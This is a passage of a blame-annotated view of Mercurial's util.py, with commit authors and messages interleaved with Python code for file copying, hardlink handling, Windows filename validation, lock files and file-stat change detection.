twaldmann@thinkmo.de
fixed some stuff pychecker shows, marked unclear/wrong stuff with XXX
r1541 a.reverse()
b.reverse()
Bryan O'Sullivan
Fix walk code for files that do not exist anywhere, and unhandled types....
r884 while a and b and a[-1] == b[-1]:
twaldmann@thinkmo.de
fixed some stuff pychecker shows, marked unclear/wrong stuff with XXX
r1541 a.pop()
b.pop()
Bryan O'Sullivan
Fix walk code for files that do not exist anywhere, and unhandled types....
r884 b.reverse()
Pulkit Goyal
py3: replace os.sep with pycompat.ossep (part 1 of 4)...
r30613 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
Bryan O'Sullivan
Fix walk code for files that do not exist anywhere, and unhandled types....
r884
Mads Kiilerich
util: introduce datapath for getting the location of supporting data files...
r22633 # the location of data files matching the source code
Yuya Nishihara
procutil: move process/executable management functions to new module...
r37136 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
Mads Kiilerich
util: introduce datapath for getting the location of supporting data files...
r22633 # executable version (py2exe) doesn't support __file__
Pulkit Goyal
py3: replace sys.executable with pycompat.sysexecutable...
r30669 datapath = os.path.dirname(pycompat.sysexecutable)
Mads Kiilerich
util: introduce datapath for getting the location of supporting data files...
r22633 else:
Pulkit Goyal
py3: use pycompat.fsencode() to convert __file__ to bytes...
r31074 datapath = os.path.dirname(pycompat.fsencode(__file__))
Pulkit Goyal
py3: make util.datapath a bytes variable...
r30301
Mads Kiilerich
i18n: use datapath for i18n like for templates and help...
r22638 i18n.setdatapath(datapath)
Matt Mackall
dispatch: generalize signature checking for extension command wrapping
r7388 def checksignature(func):
'''wrap a function with code to check for calling errors'''
def check(*args, **kwargs):
try:
return func(*args, **kwargs)
except TypeError:
if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
Matt Mackall
error: move SignatureError
r7646 raise error.SignatureError
Matt Mackall
dispatch: generalize signature checking for extension command wrapping
r7388 raise
return check
Jun Wu
util: disable hardlink for copyfile if fstype is outside a whitelist...
r31575 # a whilelist of known filesystems where hardlink works reliably
Martin von Zweigbergk
cleanup: use set literals...
r32291 _hardlinkfswhitelist = {
Augie Fackler
util: whitelist apfs for hardlink support...
r37400 'apfs',
Jun Wu
util: disable hardlink for copyfile if fstype is outside a whitelist...
r31575 'btrfs',
'ext2',
'ext3',
'ext4',
Jun Wu
util: enable hardlink for some BSD-family filesystems...
r31598 'hfs',
Jun Wu
util: disable hardlink for copyfile if fstype is outside a whitelist...
r31575 'jfs',
Matt Harbison
util: whitelist NTFS for hardlink creation (issue4580)
r35529 'NTFS',
Jun Wu
util: disable hardlink for copyfile if fstype is outside a whitelist...
r31575 'reiserfs',
'tmpfs',
Jun Wu
util: enable hardlink for some BSD-family filesystems...
r31598 'ufs',
Jun Wu
util: disable hardlink for copyfile if fstype is outside a whitelist...
r31575 'xfs',
Jun Wu
util: enable hardlink for some BSD-family filesystems...
r31598 'zfs',
Martin von Zweigbergk
cleanup: use set literals...
r32291 }
Jun Wu
util: disable hardlink for copyfile if fstype is outside a whitelist...
r31575
FUJIWARA Katsunori
util: make copyfile avoid ambiguity of file stat if needed...
r29204 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
Siddharth Agarwal
copyfile: add an optional parameter to copy other stat data...
r27369 '''copy a file, preserving mode and optionally other stat info like
FUJIWARA Katsunori
doc: describe detail about checkambig optional argument...
r29367 atime/mtime
checkambig argument is used with filestat, and is useful only if
destination file is guarded by any lock (e.g. repo.lock or
repo.wlock).
copystat and checkambig should be exclusive.
'''
FUJIWARA Katsunori
util: make copyfile avoid ambiguity of file stat if needed...
r29204 assert not (copystat and checkambig)
oldstat = None
Mads Kiilerich
util: copyfile: remove dest before copying...
r18326 if os.path.lexists(dest):
FUJIWARA Katsunori
util: make copyfile avoid ambiguity of file stat if needed...
r29204 if checkambig:
Siddharth Agarwal
filestat: move __init__ to frompath constructor...
r32772 oldstat = checkambig and filestat.frompath(dest)
Mads Kiilerich
util: copyfile: remove dest before copying...
r18326 unlink(dest)
Jun Wu
util: disable hardlink for copyfile if fstype is outside a whitelist...
r31575 if hardlink:
# Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
# unless we are confident that dest is on a whitelisted filesystem.
Yuya Nishihara
statfs: make getfstype() raise OSError...
r31678 try:
fstype = getfstype(os.path.dirname(dest))
except OSError:
fstype = None
Jun Wu
util: disable hardlink for copyfile if fstype is outside a whitelist...
r31575 if fstype not in _hardlinkfswhitelist:
hardlink = False
Jun Wu
util: enable hardlink for copyfile...
r31577 if hardlink:
Pierre-Yves David
copyfile: allow optional hardlinking...
r23899 try:
oslink(src, dest)
return
except (IOError, OSError):
pass # fall back to normal copy
Eric St-Jean
fix util.copyfile to deal with symlinks
r4271 if os.path.islink(src):
os.symlink(os.readlink(src), dest)
Siddharth Agarwal
copyfile: add an optional parameter to copy other stat data...
r27369 # copytime is ignored for symlinks, but in general copytime isn't needed
# for them anyway
Eric St-Jean
fix util.copyfile to deal with symlinks
r4271 else:
try:
shutil.copyfile(src, dest)
Siddharth Agarwal
copyfile: add an optional parameter to copy other stat data...
r27369 if copystat:
# copystat also copies mode
shutil.copystat(src, dest)
else:
shutil.copymode(src, dest)
FUJIWARA Katsunori
util: make copyfile avoid ambiguity of file stat if needed...
r29204 if oldstat and oldstat.stat:
Siddharth Agarwal
filestat: move __init__ to frompath constructor...
r32772 newstat = filestat.frompath(dest)
FUJIWARA Katsunori
util: make copyfile avoid ambiguity of file stat if needed...
r29204 if newstat.isambig(oldstat):
# stat of copied file is ambiguous to original one
Augie Fackler
cleanup: use stat_result[stat.ST_MTIME] instead of stat_result.st_mtime...
r36799 advanced = (
oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
FUJIWARA Katsunori
util: make copyfile avoid ambiguity of file stat if needed...
r29204 os.utime(dest, (advanced, advanced))
Gregory Szorc
global: mass rewrite to use modern exception syntax...
r25660 except shutil.Error as inst:
Yuya Nishihara
util: use error.Abort instead of local alias
r37114 raise error.Abort(str(inst))
Matt Mackall
util: add copyfile function
r3629
Martin von Zweigbergk
copystore: use progress helper...
r38399 def copyfiles(src, dst, hardlink=None, progress=None):
Augie Fackler
util: add progress callback support to copyfiles
r24439 """Copy a directory tree using hardlinks if possible."""
num = 0
Stephen Darnell
Add support for cloning with hardlinks on windows....
r1241
Martin von Zweigbergk
copystore: use progress helper...
r38399 def settopic():
if progress:
progress.topic = _('linking') if hardlink else _('copying')
Thomas Arendsen Hein
Use python function instead of external 'cp' command when cloning repos....
r698
mpm@selenic.com
Rewrite copytree as copyfiles...
r1207 if os.path.isdir(src):
Jun Wu
hardlink: duplicate hardlink detection for copying files and directories...
r31719 if hardlink is None:
hardlink = (os.stat(src).st_dev ==
os.stat(os.path.dirname(dst)).st_dev)
Martin von Zweigbergk
copystore: use progress helper...
r38399 settopic()
mpm@selenic.com
Rewrite copytree as copyfiles...
r1207 os.mkdir(dst)
Yuya Nishihara
osutil: proxy through util (and platform) modules (API)...
r32203 for name, kind in listdir(src):
mpm@selenic.com
Rewrite copytree as copyfiles...
r1207 srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
Martin von Zweigbergk
copystore: use progress helper...
r38399 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
Adrian Buehlmann
clone: print number of linked/copied files on --debug
r11251 num += n
mpm@selenic.com
Rewrite copytree as copyfiles...
r1207 else:
Jun Wu
hardlink: duplicate hardlink detection for copying files and directories...
r31719 if hardlink is None:
Jun Wu
hardlink: check directory's st_dev when copying files...
r31720 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
Jun Wu
hardlink: duplicate hardlink detection for copying files and directories...
r31719 os.stat(os.path.dirname(dst)).st_dev)
Martin von Zweigbergk
copystore: use progress helper...
r38399 settopic()
Jun Wu
hardlink: duplicate hardlink detection for copying files and directories...
r31719
Stephen Darnell
Add support for cloning with hardlinks on windows....
r1241 if hardlink:
try:
Adrian Buehlmann
rename util.os_link to oslink
r14235 oslink(src, dst)
Vadim Gelfer
util.copyfiles: only switch to copy if hardlink raises IOError or OSError....
r2050 except (IOError, OSError):
Stephen Darnell
Add support for cloning with hardlinks on windows....
r1241 hardlink = False
Benoit Boissinot
do not copy atime and mtime in util.copyfiles...
r1591 shutil.copy(src, dst)
Stephen Darnell
Add support for cloning with hardlinks on windows....
r1241 else:
Benoit Boissinot
do not copy atime and mtime in util.copyfiles...
r1591 shutil.copy(src, dst)
Adrian Buehlmann
clone: print number of linked/copied files on --debug
r11251 num += 1
Martin von Zweigbergk
copystore: use progress helper...
r38399 if progress:
progress.increment()
Thomas Arendsen Hein
Use python function instead of external 'cp' command when cloning repos....
r698
Adrian Buehlmann
clone: print number of linked/copied files on --debug
r11251 return hardlink, num
Adrian Buehlmann
util.copyfiles: don't try os_link() again if it failed before...
r11254
Gregory Szorc
util: use set for reserved Windows filenames...
r34054 _winreservednames = {
'con', 'prn', 'aux', 'nul',
'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
Adrian Buehlmann
util: rename _windows_reserved_filenames and _windows_reserved_chars
r14262 _winreservedchars = ':*?"<>|'
Adrian Buehlmann
path_auditor: check filenames for basic platform validity (issue2755)...
r13916 def checkwinfilename(path):
Mads Kiilerich
util: warn when adding paths ending with \...
r20000 r'''Check that the base-relative path is a valid filename on Windows.
Adrian Buehlmann
path_auditor: check filenames for basic platform validity (issue2755)...
r13916 Returns None if the path is ok, or a UI string describing the problem.
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> checkwinfilename(b"just/a/normal/path")
>>> checkwinfilename(b"foo/bar/con.xml")
Adrian Buehlmann
path_auditor: check filenames for basic platform validity (issue2755)...
r13916 "filename contains 'con', which is reserved on Windows"
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> checkwinfilename(b"foo/con.xml/bar")
Adrian Buehlmann
path_auditor: check filenames for basic platform validity (issue2755)...
r13916 "filename contains 'con', which is reserved on Windows"
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> checkwinfilename(b"foo/bar/xml.con")
>>> checkwinfilename(b"foo/bar/AUX/bla.txt")
Adrian Buehlmann
path_auditor: check filenames for basic platform validity (issue2755)...
r13916 "filename contains 'AUX', which is reserved on Windows"
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> checkwinfilename(b"foo/bar/bla:.txt")
Adrian Buehlmann
path_auditor: check filenames for basic platform validity (issue2755)...
r13916 "filename contains ':', which is reserved on Windows"
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> checkwinfilename(b"foo/bar/b\07la.txt")
Mads Kiilerich
util: warn when adding paths ending with \...
r20000 "filename contains '\\x07', which is invalid on Windows"
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> checkwinfilename(b"foo/bar/bla ")
Adrian Buehlmann
path_auditor: check filenames for basic platform validity (issue2755)...
r13916 "filename ends with ' ', which is not allowed on Windows"
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> checkwinfilename(b"../bar")
>>> checkwinfilename(b"foo\\")
Mads Kiilerich
util: warn when adding paths ending with \...
r20000 "filename ends with '\\', which is invalid on Windows"
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> checkwinfilename(b"foo\\/bar")
Mads Kiilerich
util: warn when adding paths ending with \...
r20000 "directory name ends with '\\', which is invalid on Windows"
Adrian Buehlmann
path_auditor: check filenames for basic platform validity (issue2755)...
r13916 '''
Mads Kiilerich
util: warn when adding paths ending with \...
r20000 if path.endswith('\\'):
return _("filename ends with '\\', which is invalid on Windows")
if '\\/' in path:
return _("directory name ends with '\\', which is invalid on Windows")
Adrian Buehlmann
path_auditor: check filenames for basic platform validity (issue2755)...
r13916 for n in path.replace('\\', '/').split('/'):
if not n:
continue
FUJIWARA Katsunori
win32mbcs: avoid unintentional failure at colorization...
r32566 for c in _filenamebytestr(n):
Adrian Buehlmann
util: rename _windows_reserved_filenames and _windows_reserved_chars
r14262 if c in _winreservedchars:
Adrian Buehlmann
path_auditor: check filenames for basic platform validity (issue2755)...
r13916 return _("filename contains '%s', which is reserved "
"on Windows") % c
if ord(c) <= 31:
Yuya Nishihara
py3: manually escape control character to be embedded in win filename error
r34356 return _("filename contains '%s', which is invalid "
Yuya Nishihara
stringutil: bulk-replace call sites to point to new module...
r37102 "on Windows") % stringutil.escapestr(c)
Adrian Buehlmann
path_auditor: check filenames for basic platform validity (issue2755)...
r13916 base = n.split('.')[0]
Adrian Buehlmann
util: rename _windows_reserved_filenames and _windows_reserved_chars
r14262 if base and base.lower() in _winreservednames:
Adrian Buehlmann
path_auditor: check filenames for basic platform validity (issue2755)...
r13916 return _("filename contains '%s', which is reserved "
"on Windows") % base
Yuya Nishihara
py3: replace bytes[n] with slicing in checkwinfilename()
r34357 t = n[-1:]
Matt Mackall
util: don't complain about '..' in path components not working on Windows
r15358 if t in '. ' and n not in '..':
Adrian Buehlmann
path_auditor: check filenames for basic platform validity (issue2755)...
r13916 return _("filename ends with '%s', which is not allowed "
"on Windows") % t
Jun Wu
codemod: use pycompat.iswindows...
r34646 if pycompat.iswindows:
Adrian Buehlmann
path_auditor: check filenames for basic platform validity (issue2755)...
r13916 checkosfilename = checkwinfilename
Simon Farnsworth
util: introduce timer()...
r30974 timer = time.clock
Matt Mackall
util: split out posix, windows, and win32 modules
r7890 else:
Adrian Buehlmann
util: eliminate wildcard imports
r14926 checkosfilename = platform.checkosfilename
Simon Farnsworth
util: introduce timer()...
r30974 timer = time.time
if safehasattr(time, "perf_counter"):
timer = time.perf_counter
Matt Mackall
util: split out posix, windows, and win32 modules
r7890
def makelock(info, pathname):
Yuya Nishihara
lock: block signal interrupt while making a lock file...
r36717 """Create a lock file atomically if possible
This may leave a stale lock file if symlink isn't supported and signal
interrupt is enabled.
"""
Matt Mackall
util: split out posix, windows, and win32 modules
r7890 try:
return os.symlink(info, pathname)
Gregory Szorc
global: mass rewrite to use modern exception syntax...
r25660 except OSError as why:
Matt Mackall
util: split out posix, windows, and win32 modules
r7890 if why.errno == errno.EEXIST:
raise
except AttributeError: # no symlink in os
pass
Yuya Nishihara
py3: read/write plain lock file in binary mode...
r36801 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
ld = os.open(pathname, flags)
Thomas Arendsen Hein
Make makelock and readlock work on filesystems without symlink support....
r704 os.write(ld, info)
os.close(ld)
Matt Mackall
util: split out posix, windows, and win32 modules
r7890 def readlock(pathname):
try:
Matt Harbison
py3: convert os.readlink() path to native strings on Windows...
r39940 return readlink(pathname)
Gregory Szorc
global: mass rewrite to use modern exception syntax...
r25660 except OSError as why:
Matt Mackall
util: split out posix, windows, and win32 modules
r7890 if why.errno not in (errno.EINVAL, errno.ENOSYS):
raise
except AttributeError: # no symlink in os
pass
Matt Harbison
util: use a context manager in readlock()
r39941 with posixfile(pathname, 'rb') as fp:
return fp.read()
Thomas Arendsen Hein
Make makelock and readlock work on filesystems without symlink support....
r704
Vadim Gelfer
fix file handling bugs on windows....
r2176 def fstat(fp):
'''stat file object that may not have fileno method.'''
try:
return os.fstat(fp.fileno())
except AttributeError:
return os.stat(fp.name)
Matt Mackall
imported patch folding
r3784 # File system features
Martin von Zweigbergk
util: rename checkcase() to fscasesensitive() (API)...
r29889 def fscasesensitive(path):
Matt Mackall
imported patch folding
r3784 """
Mads Kiilerich
util: improve doc for checkcase
r18911 Return true if the given path is on a case-sensitive filesystem
Matt Mackall
imported patch folding
r3784
Requires a path (like /foo/.hg) ending with a foldable final
directory component.
"""
Siddharth Agarwal
util.checkcase: don't abort on broken symlinks...
r24902 s1 = os.lstat(path)
Matt Mackall
imported patch folding
r3784 d, b = os.path.split(path)
FUJIWARA Katsunori
icasefs: consider as case sensitive if there is no counterevidence, for safety...
r15667 b2 = b.upper()
if b == b2:
b2 = b.lower()
if b == b2:
return True # no evidence against case sensitivity
p2 = os.path.join(d, b2)
Matt Mackall
imported patch folding
r3784 try:
Siddharth Agarwal
util.checkcase: don't abort on broken symlinks...
r24902 s2 = os.lstat(p2)
Matt Mackall
imported patch folding
r3784 if s2 == s1:
return False
return True
Idan Kamara
eliminate various naked except clauses
r14004 except OSError:
Matt Mackall
imported patch folding
r3784 return True
Bryan O'Sullivan
matcher: use re2 bindings if available...
r16943 try:
import re2
_re2 = None
except ImportError:
_re2 = False
Siddharth Agarwal
util: move compilere to a class...
r21908 class _re(object):
Siddharth Agarwal
util.re: move check for re2 into a separate method...
r21913 def _checkre2(self):
global _re2
try:
# check if match works, see issue3964
_re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
except ImportError:
_re2 = False
Siddharth Agarwal
util: move compilere to a class...
r21908 def compile(self, pat, flags=0):
'''Compile a regular expression, using re2 if possible
Bryan O'Sullivan
matcher: use re2 bindings if available...
r16943
Siddharth Agarwal
util: move compilere to a class...
r21908 For best performance, use only re2-compatible regexp features. The
only flags from the re module that are re2-compatible are
IGNORECASE and MULTILINE.'''
if _re2 is None:
Siddharth Agarwal
util.re: move check for re2 into a separate method...
r21913 self._checkre2()
Siddharth Agarwal
util: move compilere to a class...
r21908 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
if flags & remod.IGNORECASE:
pat = '(?i)' + pat
if flags & remod.MULTILINE:
pat = '(?m)' + pat
try:
return re2.compile(pat)
except re2.error:
pass
return remod.compile(pat, flags)
Siddharth Agarwal
util.re: add an escape method...
r21914 @propertycache
def escape(self):
'''Return the version of escape corresponding to self.compile.
This is imperfect because whether re2 or re is used for a particular
function depends on the flags, etc, but it's the best we can do.
'''
global _re2
if _re2 is None:
self._checkre2()
if _re2:
return re2.escape
else:
return remod.escape
Siddharth Agarwal
util: move compilere to a class...
r21908 re = _re()
Bryan O'Sullivan
matcher: use re2 bindings if available...
r16943
Paul Moore
Add a new function, fspath...
r6676 _fspathcache = {}
def fspath(name, root):
'''Get name in the case stored in the filesystem
FUJIWARA Katsunori
icasefs: avoid path-absoluteness/existance check in util.fspath() for efficiency...
r15710 The name should be relative to root, and be normcase-ed for efficiency.
Note that this function is unnecessary, and should not be
Paul Moore
Add a new function, fspath...
r6676 called, for case-sensitive filesystems (simply because it's expensive).
FUJIWARA Katsunori
icasefs: avoid normcase()-ing in util.fspath() for efficiency...
r15670
FUJIWARA Katsunori
icasefs: avoid path-absoluteness/existance check in util.fspath() for efficiency...
r15710 The root should be normcase-ed, too.
Paul Moore
Add a new function, fspath...
r6676 '''
Siddharth Agarwal
util.fspath: use a dict rather than a linear scan for lookups...
r23097 def _makefspathcacheentry(dir):
return dict((normcase(n), n) for n in os.listdir(dir))
FUJIWARA Katsunori
icasefs: retry directory scan once for already invalidated cache...
r15709
Pulkit Goyal
py3: replace os.sep with pycompat.ossep (part 1 of 4)...
r30613 seps = pycompat.ossep
Pulkit Goyal
py3: replace os.altsep with pycompat.altsep...
r30625 if pycompat.osaltsep:
seps = seps + pycompat.osaltsep
Paul Moore
Add a new function, fspath...
r6676 # Protect backslashes. This gets silly very quickly.
seps.replace('\\','\\\\')
Augie Fackler
util: use bytes re on bytes input in fspath...
r31496 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
FUJIWARA Katsunori
icasefs: use util.normcase() instead of lower() or os.path.normcase in fspath...
r15669 dir = os.path.normpath(root)
Paul Moore
Add a new function, fspath...
r6676 result = []
for part, sep in pattern.findall(name):
if sep:
result.append(sep)
continue
FUJIWARA Katsunori
icasefs: follow standard cache look up pattern
r15719 if dir not in _fspathcache:
Siddharth Agarwal
util.fspath: use a dict rather than a linear scan for lookups...
r23097 _fspathcache[dir] = _makefspathcacheentry(dir)
FUJIWARA Katsunori
icasefs: follow standard cache look up pattern
r15719 contents = _fspathcache[dir]
Paul Moore
Add a new function, fspath...
r6676
Siddharth Agarwal
util.fspath: use a dict rather than a linear scan for lookups...
r23097 found = contents.get(part)
FUJIWARA Katsunori
icasefs: retry directory scan once for already invalidated cache...
r15709 if not found:
FUJIWARA Katsunori
icasefs: rewrite comment to explain situtation precisely
r15720 # retry "once per directory" per "dirstate.walk" which
# may take place for each patches of "hg qpush", for example
Siddharth Agarwal
util.fspath: use a dict rather than a linear scan for lookups...
r23097 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
found = contents.get(part)
FUJIWARA Katsunori
icasefs: retry directory scan once for already invalidated cache...
r15709
result.append(found or part)
FUJIWARA Katsunori
icasefs: use util.normcase() instead of lower() or os.path.normcase in fspath...
r15669 dir = os.path.join(dir, part)
Paul Moore
Add a new function, fspath...
r6676
return ''.join(result)
Adrian Buehlmann
opener: check hardlink count reporting (issue1866)...
r12938 def checknlink(testfile):
'''check whether hardlink count reporting works properly'''
Adrian Buehlmann
checknlink: use two testfiles (issue2543)...
r13204 # testfile may be open, so we need a separate file for checking to
# work around issue2543 (or testfile may get lost on Samba shares)
Jun Wu
checknlink: rename file object from 'fd' to 'fp'...
r34086 f1, f2, fp = None, None, None
Adrian Buehlmann
opener: check hardlink count reporting (issue1866)...
r12938 try:
Yuya Nishihara
py3: wrap tempfile.mkstemp() to use bytes path...
r38182 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
Jun Wu
checknlink: use a random temp file name for checking...
r34081 suffix='1~', dir=os.path.dirname(testfile))
os.close(fd)
f2 = '%s2~' % f1[:-2]
Matt Mackall
util: use try/except/finally
r25088 oslink(f1, f2)
Adrian Buehlmann
opener: check hardlink count reporting (issue1866)...
r12938 # nlinks() may behave differently for files on Windows shares if
# the file is open.
Jun Wu
checknlink: rename file object from 'fd' to 'fp'...
r34086 fp = posixfile(f2)
Adrian Buehlmann
checknlink: use two testfiles (issue2543)...
r13204 return nlinks(f2) > 1
Matt Mackall
util: use try/except/finally
r25088 except OSError:
return False
Adrian Buehlmann
opener: check hardlink count reporting (issue1866)...
r12938 finally:
Jun Wu
checknlink: rename file object from 'fd' to 'fp'...
r34086 if fp is not None:
fp.close()
Adrian Buehlmann
checknlink: use two testfiles (issue2543)...
r13204 for f in (f1, f2):
try:
Jun Wu
checknlink: use a random temp file name for checking...
r34081 if f is not None:
os.unlink(f)
Adrian Buehlmann
checknlink: use two testfiles (issue2543)...
r13204 except OSError:
pass
Adrian Buehlmann
opener: check hardlink count reporting (issue1866)...
r12938
Shun-ichi GOTO
Add endswithsep() and use it instead of using os.sep and os.altsep directly....
r5843 def endswithsep(path):
'''Check path ends with os.sep or os.altsep.'''
Pulkit Goyal
py3: replace os.sep with pycompat.ossep (part 1 of 4)...
r30613 return (path.endswith(pycompat.ossep)
Pulkit Goyal
py3: replace os.altsep with pycompat.altsep...
r30625 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
Shun-ichi GOTO
Add endswithsep() and use it instead of using os.sep and os.altsep directly....
r5843
Shun-ichi GOTO
Add util.splitpath() and use it instead of using os.sep directly....
r5844 def splitpath(path):
'''Split path by os.sep.
Note that this function does not use os.altsep because this is
an alternative of simple "xxx.split(os.sep)".
It is recommended to use os.path.normpath() before using this
function if need.'''
Pulkit Goyal
py3: replace os.sep with pycompat.ossep (part 1 of 4)...
r30613 return path.split(pycompat.ossep)
Shun-ichi GOTO
Add util.splitpath() and use it instead of using os.sep directly....
r5844
Boris Feld
update: fix edge-case with update.atomic-file and read-only files...
r41325 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
Alexis S. L. Carvalho
turn util.opener into a class
r4827 """Create a temporary file with the same contents from name
The permission bits are copied from the original file.
If the temporary file is going to be truncated immediately, you
can use emptyok=True as an optimization.
Returns the name of the temporary file.
Vadim Gelfer
fix file handling bugs on windows....
r2176 """
Alexis S. L. Carvalho
turn util.opener into a class
r4827 d, fn = os.path.split(name)
Yuya Nishihara
py3: wrap tempfile.mkstemp() to use bytes path...
r38182 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
Alexis S. L. Carvalho
turn util.opener into a class
r4827 os.close(fd)
# Temporary files are created with mode 0600, which is usually not
# what we want. If the original file already exists, just copy
# its mode. Otherwise, manually obey umask.
Boris Feld
update: fix edge-case with update.atomic-file and read-only files...
r41325 copymode(name, temp, createmode, enforcewritable)
Alexis S. L. Carvalho
turn util.opener into a class
r4827 if emptyok:
return temp
try:
try:
ifp = posixfile(name, "rb")
Gregory Szorc
global: mass rewrite to use modern exception syntax...
r25660 except IOError as inst:
Alexis S. L. Carvalho
turn util.opener into a class
r4827 if inst.errno == errno.ENOENT:
return temp
if not getattr(inst, 'filename', None):
inst.filename = name
raise
ofp = posixfile(temp, "wb")
for chunk in filechunkiter(ifp):
ofp.write(chunk)
ifp.close()
ofp.close()
Brodie Rao
check-code: ignore naked excepts with a "re-raise" comment...
r16705 except: # re-raises
Alex Gaynor
style: never put multiple statements on one line...
r34436 try:
os.unlink(temp)
except OSError:
pass
Alexis S. L. Carvalho
turn util.opener into a class
r4827 raise
return temp
Vadim Gelfer
fix file handling bugs on windows....
r2176
FUJIWARA Katsunori
util: add filestat class to detect ambiguity of file stat...
r29200 class filestat(object):
"""help to exactly detect change of a file
'stat' attribute is result of 'os.stat()' if specified 'path'
exists. Otherwise, it is None. This can avoid preparative
'exists()' examination on client side of this class.
"""
Siddharth Agarwal
filestat: move __init__ to frompath constructor...
r32772 def __init__(self, stat):
self.stat = stat
@classmethod
def frompath(cls, path):
FUJIWARA Katsunori
util: add filestat class to detect ambiguity of file stat...
r29200 try:
Siddharth Agarwal
filestat: move __init__ to frompath constructor...
r32772 stat = os.stat(path)
FUJIWARA Katsunori
util: add filestat class to detect ambiguity of file stat...
r29200 except OSError as err:
if err.errno != errno.ENOENT:
raise
Siddharth Agarwal
filestat: move __init__ to frompath constructor...
r32772 stat = None
return cls(stat)
FUJIWARA Katsunori
util: add filestat class to detect ambiguity of file stat...
r29200
Siddharth Agarwal
fsmonitor: don't write out state if identity has changed (issue5581)...
r32816 @classmethod
def fromfp(cls, fp):
stat = os.fstat(fp.fileno())
return cls(stat)
FUJIWARA Katsunori
util: add filestat class to detect ambiguity of file stat...
r29200 __hash__ = object.__hash__
def __eq__(self, old):
try:
# if ambiguity between stat of new and old file is
Mads Kiilerich
spelling: fixes of non-dictionary words
r30332 # avoided, comparison of size, ctime and mtime is enough
FUJIWARA Katsunori
util: add filestat class to detect ambiguity of file stat...
r29200 # to exactly detect change of a file regardless of platform
return (self.stat.st_size == old.stat.st_size and
Augie Fackler
cleanup: use stat_result[stat.ST_MTIME] instead of stat_result.st_mtime...
r36799 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
FUJIWARA Katsunori
util: add filestat class to detect ambiguity of file stat...
r29200 except AttributeError:
FUJIWARA Katsunori
util: make filestat.__eq__ return True if both of self and old have None stat...
r32749 pass
try:
return self.stat is None and old.stat is None
except AttributeError:
FUJIWARA Katsunori
util: add filestat class to detect ambiguity of file stat...
r29200 return False
def isambig(self, old):
"""Examine whether new (= self) stat is ambiguous against old one
"S[N]" below means stat of a file at N-th change:
- S[n-1].ctime < S[n].ctime: can detect change of a file
- S[n-1].ctime == S[n].ctime
- S[n-1].ctime < S[n].mtime: means natural advancing (*1)
- S[n-1].ctime == S[n].mtime: is ambiguous (*2)
- S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
- S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
Case (*2) above means that a file was changed twice or more at
same time in sec (= S[n-1].ctime), and comparison of timestamp
is ambiguous.
Base idea to avoid such ambiguity is "advance mtime 1 sec, if
timestamp is ambiguous".
But advancing mtime only in case (*2) doesn't work as
expected, because naturally advanced S[n].mtime in case (*1)
might be equal to manually advanced S[n-1 or earlier].mtime.
Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
treated as ambiguous regardless of mtime, to avoid overlooking
by confliction between such mtime.
Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
S[n].mtime", even if size of a file isn't changed.
"""
try:
Augie Fackler
cleanup: use stat_result[stat.ST_MTIME] instead of stat_result.st_mtime...
r36799 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
FUJIWARA Katsunori
util: add filestat class to detect ambiguity of file stat...
r29200 except AttributeError:
return False
FUJIWARA Katsunori
util: add utility function to skip avoiding file stat ambiguity if EPERM...
r30319 def avoidambig(self, path, old):
"""Change file stat of specified path to avoid ambiguity
'old' should be previous filestat of 'path'.
This skips avoiding ambiguity, if a process doesn't have
FUJIWARA Katsunori
util: make filestat.avoidambig() return whether ambiguity is avoided or not
r32746 appropriate privileges for 'path'. This returns False in this
case.
Otherwise, this returns True, as "ambiguity is avoided".
FUJIWARA Katsunori
util: add utility function to skip avoiding file stat ambiguity if EPERM...
r30319 """
Augie Fackler
cleanup: use stat_result[stat.ST_MTIME] instead of stat_result.st_mtime...
r36799 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
FUJIWARA Katsunori
util: add utility function to skip avoiding file stat ambiguity if EPERM...
r30319 try:
os.utime(path, (advanced, advanced))
except OSError as inst:
if inst.errno == errno.EPERM:
# utime() on the file created by another user causes EPERM,
# if a process doesn't have appropriate privileges
FUJIWARA Katsunori
util: make filestat.avoidambig() return whether ambiguity is avoided or not
r32746 return False
FUJIWARA Katsunori
util: add utility function to skip avoiding file stat ambiguity if EPERM...
r30319 raise
FUJIWARA Katsunori
util: make filestat.avoidambig() return whether ambiguity is avoided or not
r32746 return True
FUJIWARA Katsunori
